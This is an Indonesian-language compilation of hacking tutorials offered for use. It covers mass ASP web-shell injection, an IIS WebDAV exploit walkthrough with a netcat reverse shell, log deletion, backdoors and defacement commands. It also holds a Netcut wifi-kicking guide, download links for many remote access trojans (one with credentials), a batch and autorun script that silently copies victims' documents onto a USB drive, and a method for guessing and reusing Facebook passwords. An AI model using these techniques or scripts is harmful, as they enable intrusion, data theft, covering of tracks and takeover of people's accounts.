Telah direlease darkjumper versi ke 5 oleh my brother gunslinger dengan pengembangan 2 dari darkjumper versi 4.
Fungsi – fungsi tool ini terfokus pada penetrasi terhadap suatu server shared hosting, antara lain:
1. User enumeration
2. Scan sqli, blind sqli, lfi dan rfi pada tiap web yang dihost di server yang sama
3. Scanning CGI dan struktur path umum web
4. Port Scan
5. Auto Dictionary Attack setelah user enumeration
6. Auto sql inject setelah ditemukan bug mysql injection (mencari panjang kolom otomatis)

7. Tambahan fungsi proksi
8. Tambahan Verbositas
9. Fitur ip dan geo checking

Perkembangan projek di sourceforge:
http://sourceforge.net/projects/darkjumper/
Selengkapnya view: www.arielthekillers.co.cc

pertama-tama yang kita perlukan adalah mendowload alat perang berikut,,wkkwkwkwkw….
1. aspshellmaker
2. asp-scanner
3. shell asp
fungsi dari t-tool tadi adalah sebagai berikut…
asp shell maker
Tool ini berfungsi untuk otomatis menginjek web asp yang vulnerable. Cara kerjanya cukup mudah anda siapkan dulu web.txt berisi url web asp yang vuln, dan shell.asp yang sudah saya sertakan pada tool diatas. Tinggal buka aplikasi aspshellmaker terus klik Hajar, maka tool otomatis akan mengecek dan menginjekan shell anda ke web asp yang vuln.

asp-scanner
tool ini berguna untuk men-scan web asp yang vuln, anda tinggal pilih type scan nya asp sql injection dorknya juga anda bisa ubah-ubah sendiri lalu klik Scan, maka tool akan otomatis men-scan web-web asp yang vuln. setelah selesai melakukan scan hasil dari scan akan berada di indonesia.txt di dalam folder tool tersebut.
shell.asp
ini adalah aspshell yang berfungsi sebagai shell di web berbasis asp.
Langkah kerjanya…
1. Scan dulu pake asp-scanner

2. setelah selesai scan , hasil dr scan ( indonesia.txt) isinya di kopas pindahin ke web.txt

3. buka aplikasi aspshellmaker, kemudian klik hajar

4. cek hasil injekan dari tool aspshellmaker di berhasil.txt


hasil deface :
http://www.hgxwkj.com/d00m_brin69er.txt
Selamat membaca, Semoga berguna….

1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!

2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa<shell_code_anda>
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan  exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
Well, sekarang computer beraksi sebagai suatu server di port 6666 dan listening terhadap berbagai incoming request. Sekarang compile exploit kralor atau gunakan yang berbasis GUI, kemudian masuk ke DOS prompt dan ketik.
D:\vcproject\webdave\debug>web.exe
[Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt]
www.coromputer.net && undernet #coromputer
syntax: D:\WEB.EXE <host_target> <host_anda> <port_anda> [padding]
Cool !!!  Jadi apa yang harus anda lakukan? Masih bingung? OK, saya sarankan, jika anda ingin menghack suatu server, carilah ip dengan melakukan ping dari DOS. Misalkan ip 123.123.123.123 dan ip kita 200.200.200.200. Pastikan netcat menjalankan beberapa port seperti 6666 dan ketik perintah pada Dos Prompt yang baru:
D:\vcproject\webdave\debug>web.exe  123.123.123.123  200.200.200.200  6666
Terdapat padding bit yang berbeda. Dalam kasus exploit berbasis GUI dapat melakukannya sendiri, atau membaca kometar dalam exploit tersebut untuk mendapatkan suatu ide mengenai apa padding bit tersebut dan bagaimana cara menggunakannya. Setelah berhasil mengeksploitasi anda akan mendapatkan shell pada netcat listener anda.
D:\nc>nc -Lvp 6666
Listening on [any] 6666 ….
connect to 200.200.200.200 from 123.123.123.123
Microsoft(R) Windows 2000
(C)Copyright Microsoft Corp 1981-2000.
C:\winnt\system32>
Selamat!! Jadi anda berhasil mengeksploitasi bug ntdll.dll pada remote server. Command prompt telah kita dapatkan pada netcat listener yang merupakan command prompt pada remote server.
4) Apa yang harus dilakuklansetelah melakukan hacking suatu server?
Pertama kali yang terpenting yang harus dilakukan setelah melakukan hacking berbagai server di dunia internet adalah menghapus log tersebut. Setelah kita memiliki HTTP Port 80 untuk menghack, kita perlu menghapus log IIS. Direktorinya dalam hal ini ada di C:\winnt\system32\logfiles . Jadi pada shell tersebut anda tinggal mengetik.
C:\winnt\system32> rmdir /s /q logfiles
Yang menghapus direktori log file, file dan folder yang terdapat dalam direktori tersebut.
Catatan: Ini merupakan cara yang buruk dalam menghapus file log. Admin dapat langsung mengetahui bahwa seseorang telah menghacking servernya. Cara lain yang terbaik adalah masuk kedalam direktori logfile dan cari file log yang spesifik dan menghapus hanya pada baris ayng berisikan ip anda.
Sekarang, setelah megnhapus log file. Anda dapat bermain-main dengan server tersebut. Seluruh server berada dalam kendali anda. Hal terbaik adalah menginstall suatu backdoor pada server tersebut. Membua backdoor senfiri atau sebagai gantinya mengupload netcat apda server tersebut dan menjadinnya listen pada beberapa port yang spesifik dan anda juga dapat menambahkan entri dalam registri jadi dapat tetap dalam keadaan listening bahkan setelah server tersebut direstart.
Langkah berikutnya, misalkan anda ingin mendeface situs tersebut, maka carilah direktori webrootnya. Direktori default biasanya adalah  C:\inetpub\wwwroot, disana anda akan menemukan file seperti index.html, index.asp, default.html dan file-file lain seperti itu. Jika ada, maka anda sudah berada pada direktori yang dimaksud. Sekarang tinggal membackup file index.html nya. Perintahnya adalah sebagai berikut:
C:\inetpub\wwwroot> copy index.html indexold.html
C:\inetpub\wwwroot> echo defaced by Chintan Trivedi > index.html
Wah !! Akhirnya anda berhasil mendeface situs tersebut. Jika anda ingin mengupload file anda sendiri ke server tersebut, maka anda harus memiliki TFTP server pada sistem anda. Jalankan dan ketik ketik perintah remote shell berikut:
C:\inetpub\wwwroot> tftp 200.200.200.200 GET index.html
Perintah ini akan mengupload file index.html anda ke web server. Oh ya, contoh diatas dengan anggapan 200.200.200.200 menjadi ip anda. Dan ingatlah mengenai satu hal penting. Webdave exploit dapat menyebabkan crash pada server IIS. Jadi situs tidak akan terbuka dan anda tidak dapat melihat halaman yang terdeface L Jangan khawatir, ada cara untuk merestart IIS pada remote system tersebut, yaitu:
C:\inetpub\wwwroot> iisreset /restart /rebootonerror /timeout:100
Tunggulah sebentar dan bukalah situs tersebut, misalnya www.target.com dan lihat halaman yang telah anda deface!!! Nah ini semua hanyalah satu contoh hacking webserver menggunakan webdave exploit. Terus memperbarui sesi 0day anda di www.hackersprogrammers.com dengan 0day exploit terbaru. Setiap exploit bekerja dengan caranya masing-masing. Anda dapat melihat penjelasan yang tersedia pada exploit tersebut jika anda bukan seorang script kiddie.
5) Kesimpulan
Hal yang perlu saya katakan kepada anda bahwa hacking atau mendeface melalui exploit ‘siap-pakai’ yang tersedia di internet adalah tindakan merusak. Janganlah dilakukan terus menerus. Melakukan hacking suatu server hanya jika anda memang memiliki alasan kuat untuk melakukannya dan anda benar-benar mengetahui apa yang sedang anda lakukan. Jika anda melakukan hacking secara membabi-buta anda hanya akan menyebabkan berbagai kerusakan, kebencian dan tidak memahami bagaimana dunia ini bekerja.
Dan untuk admin: jika anda ingin melindungi server anda dari hacker, maka langkah terbaik adalah tetap mengupdate dengan service pack terakhir yang disediakan oleh Microsoft. Kedua, kapanpun server anda dihack atau terdeface, silakan periksa pada sistem anda, apakah telah terinstall backdoor, rootkit. Kalau ada, hapuslah. Ketiga menjaga direktori file log dari seseorang yang tidak berhak. IIS menyediakan fasilitas untuk mengubah direktori file log. Tapi dalam berbagai kasus, tetap saja pencegahan jauh lebih baik daripada penyembuhan.

Okay langsung aja deh,Sekarang Saya akan mencoba mengajari bagaimana menendang seseorang dari Wireless Connection kalian,hehe…gampang ,kalian hanya butuh waktu 10 detik , kalau lebih dari 10 detik, berarti Brainwarenya yang kurang sepp…hahhaa
Pertama, Siapkan Toolnya
Netcut :http://www.4shared.com/file/12255805/c640e8bc/netcut_208.html

dan sedikit Otak + rokok 1 bungkus..kalau ada kopi juga boleh..hehehe
Okay untuk pemula Execute Netcut nya.setelah kalian menjalankan Booter nya kalian akan mmemiliki tampilan sepert ini

Next yang kalian lakukan ialah menekan Tombol Find ,akan ada pop up window. Saat kalian berada pada saat memasukan Local ip ke textbox maka user akan telihat.jika kalian ga tau cara lihat Local IP ,cari gateway kalian dan lihat.

Setelah nya gampang,kalian tinggal pilih User yang ingin di tendang,lalu Tekan Cut OFF. Mati Dech Koneksinya..hahhaha…

Mudah kan? hehehe….

APa itu RAT?
Oks RAT kependekan dari Remote Administrator TOol
Rat di gunakan untuk menghubungkan dan mengatur satu atau lebih komputer dengan berbagai kemampuan seperti:
# Screen/camera capture atau control
# File management (download/upload/execute/dll.)
# Shell control (CMD control)
# Computer control (power off/on/log off)
# Registry management (query/add/delete/modify)
# spesifikasi dari Produk RAT lain masing2.
Direct Connection
RAT type direct-connection adalah RAT dengan set up yang simple dimana Client(orang yang menyebarkan)mengkoneksikan dirinya ke satu atau lebih Server(komputer korban)secara langsung.
Reverse Connection
RAT yang menggunakan dan mengutilisasi Reverse Connection memiliki Beberapa Kelebihan

#Keluar masuk nya koneksi umumnya tidak terlacak. dan tidak terdeteksi atau di Block oleh Firewall,seperti Router.
#karena Remote komputer mengkoneksikan ke Remote administrator,Si pelaku tidak perlu mengetahui IP korban untuk melakukan hubungan.jadi dalam satu RAT pasti akan ada Client dan Server.2 Tools dalam satu software.
#mass-distribution,artinya kita bisa menyebarkan Server nya ke pada siapapun ,dan kita bisa mengontrol komputer – komputer yang sudah terinstal kan Server kita (remote komputer)lebih dari satu pada saat bersamaan.
#Jika Mass-distribution dilakukan,lebih mudah untuk Tracking komputer yang sudah di sadap dan terinstallkan RAT tersbut.karena ada fasilitas “calling home” oleh koneksi ke REmote administrator (komputer kita)
Most Pupolar RAT programs With Links, see below:
1. Cerberus RAT

Download:
http://uploading.com/files/mbe9161b/Cerberus.rar/
Resource
http://www.youtube.com/watch?v=q5u_pZUN9F8
2. Nuclear Rat 2.1.0

Download :
http://uploading.com/files/4ZIOSRJG/NuclearRat.rar.html
3. Prorat RAT

Download:
http://uploading.com/files/MTE65R3D/ProRatSE.rar.html
Rar Password: oksa52wq
Username: mohdjase1 Password: 66618e869accfc4f96
resource:
http://www.youtube.com/watch?v=8OKMELrLU3Q
4. CyberGate RAT

Download:
http://uploading.com/files/23b14467/CyberGate%2Bv1.00.1.rar/
5. Seed 1.1 Rat

Download:
http://uploading.com/files/QESMWWA0/Seed1.1.zip.html
6. Lost Door V4.2 LIGHT

Download:
http://uploading.com/files/f277398c/Lost%2BDoor%2BV4.2%2Blight.zip/
7. Apocalypse RAT

Downlaod:
http://uploading.com/files/4eca9bdd/Apocalypse144.rar/
8. SubSeven RAT

Download :
http://uploading.com/files/4JFEZPNW/Sub7v2.2.zip.html
9. Spy-Net RAT

Download:
http://uploading.com/files/2717bd57/Spt-Net%2B%255BRAT%255D%2Bv2.6.rar/
Password: Spy-Net
Resource :
http://www.youtube.com/watch?v=5lv8H9tGCUU
10.Turkojan Gold RAT

Download :
http://uploading.com/files/c7c5d282/Turkojan4Gold.rar/
Resource :
http://www.youtube.com/watch?v=Z8uJJDhZHuQ
Other Best Rat
11.Poison Ivy Rat
download:
http://www.poisonivy-rat.com/index.php?link=download
resource:
http://www.youtube.com/watch?v=T55dJV40_sk
12.Shark RAT v3.0.0
Download:
http://uploading.com/files/O84EB7K0/sharK_3.rar.html
13.BiFrost RAT
Download:
http://uploading.com/files/CUP1QGM3/Bifrost12.zip.html

Pada kesempatan ini saya akan sharing menngenai merampok data di kompi dengan USB Flash Drive.. ok let’s start mulai aja yuk.

1. Buka notepad pertama . .. kalau anda lagi males ngetik bisa copas tulisan di bawah ini ..

@echo off
REM Name : silentxxx
REM Author : Silentxxx
Set silent=%computername% _ %random%
If not exist ”%silent%” Md “%silent%”
For%%a in (C D E F G H I J) do if exist %%a:\ (
For /f “tokens=*” %%b in (‘dir /a/b/s %%a:\*.doc’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f  “tokens=*” %%b in (‘dir /a/b/s%%a:\.xls’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %% b in (‘dir /a/b/s%%a:/*.txt’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
For /f “tokens=*” %%b in (‘dir /a/b/s%%a:/*.docx’) do (
attrib –s –h –r “%%b”
copy “%%b” “%silent%” /y)
)

1. Save file tersebut dengan nama terserah .bat dan save as type all files .,udah pa blon??

Sekarang coba di jalankan file dengan exstensi bat tersebut maka di samping File akan terbuat semua file yang di copy dari drive C ampai Z (kalau punya )wkwkwk. gila banyak amat..
Code di atas dapat di ubah atau di tambah sesuai dengan keinginan kalian masing-masing bisa di tambahkan kode
For /f “tokens=*”  %%b in (‘dir /a/b/s%%a:\*.zip’)  do(
attrib –s –h –r  “%%b”
copy “%%b” “%silent%” /y)
maka file yang berextensi zip akan masuk ke Flash Disk kamu (wah lumayan dapat software kompresan gratis wkwkwk)
ubah sesuai extensi apa yang kamu inginkan misalnya *.pdf  atau *.html
maka file terserah.bat akan berjalan sesuai dengan keinginan anda .
File tersebut bisa anda ubah ke bentuk extensi exe. .. enak atuh,, lebih mudah.. dengan software Bat_To_Exe_ConverterV1.5  kalau belum punya kakak-kakak bisa download di http://www/brothersoft.com/bat-to-exe-converter-50301.html
Cara mengubahnya adalah

1. Buka software tersebut..
2. Pilih yang compile
3. Dan sekarang file.bat yang tadi kita buat menjadi file yang berextensi *.exe lebih enak kan ..
4. Agar file tersebut maka kita harus buat file autorun
5. Buka notepad ketikkan

[autorun]
Open=terserah.exe

1. save as dengan nama Autorun.inf dan terserah.exe di dalam directory USB Flash Drive kamu..
2. Selesai .. Akhirnya sekarang colokkan atau masukkan FD kamu atau loe atau agan di pc mana aja akan terkcopy banyak data yang kamu terima ..

Semoga bermanfaat ,,,,,,,,,

Bukan karena mereka hebat bisa membobol keamanan facebook, tapi karena Anda sendiri yang memberikan password kepada mereka!! 

Cara 1
Request jadi teman victim / target di facebook.
Cara 2
Lihat profilenya. Catat tanggal lahir, nama istri, pacar, anak, adik kakak, dan tanggal lahir mereka. Semua hal yang ada di facebooknya, sedetail-detailnya!
Cara 3

Logout.  Coba-coba kombinasi password dari data profile yang victim berikan. Jika berhasil, lanjut ke Step Four. Jika Gagal kembali ke Cara 1.
Cara 4
Jika account facebook victim berhasil masuk, coba-coba ke account social network victim lainnya, termasuk email, control panel website, paypal,internet banking dan lain-lain, karena kemungkinan victim menggunakan password yang sama sangat besar.
Cara 5
Bersihkan data profile facebook account Anda dari hal-hal yang nyaris bahkan sama dengan password yang sedang Anda gunakan jika tidak ingin hal yang sama menimpa Anda

Gak ada kerjaan? Bosen buka facebook mau ngapain? Yuk mari kita intip private profile yang di facebook.
Pertama-tama kita persiapkan script & addon mozilla dulu:

1. Java Script Untuk Melihat Facebook: http://userscripts.org/scripts/source/9580.user.js
2. Greasmonkey Addon Firefox: https://addons.mozilla.org/en-US/firefox/addon/748

Setelah selesai mempersiapkan:

1. Install Greasmonkey Addon
2. Install Java Script
3. Restart Firefox

Tools hack ini akan menambahkan link di atas foto tersebut dengan link “See this Photo in its Album” di album nya.  Nah tinggal di klik ajah

Selamat mencoba, semoga berhasil & selamat bersenang2

Salam hangat dari MummyMaster.

Tetap tingkatkan Ukhuwah..

Enjoy & Eat It!